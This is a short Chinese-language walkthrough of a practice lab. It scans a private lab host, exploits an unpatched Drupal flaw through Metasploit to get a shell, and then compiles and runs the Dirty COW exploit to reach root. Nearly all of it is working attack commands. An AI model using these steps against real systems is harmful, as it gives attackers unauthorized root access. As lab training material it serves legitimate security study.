- 信息搜集
netdiscover -r 192.168.136.0/24
nmap -sS -sV -A 192.168.136.143
nmap -p 1-62235 192.168.136.143
http://192.168.136.143:1898/robots.txt
查看changelog 日志文件,此文件包含linux漏洞修复信息
http://192.168.136.143:1898/CHANGELOG.txt
发现2017中的Drupal 漏洞没有修复,可以在kali上msf,进行利用msfconsole
search Drupal
use 1
set rhost 192.168.136.143
set rport 1898
run
getshell目标靶机现在利用kali自带的提权脚本dirty cow进行web提权
searchsploit dirty
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kali
将kali上的脚本利用msf上传到目标机中
upload /home/kali/40847.cpp /tmp/40847.cpp
上传之后就是利用g++运行此c++脚本
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil //g++编译文件
ls // 查看文件
./dcow //运行文件
利用生成的密码返回虚拟机终端进行登陆,一开始想直接在webshell中 su root可是被deny了,就只能返回虚拟机登陆
user:root //账号
pw:dirtyCowFun //密码
whoami //查看当前用户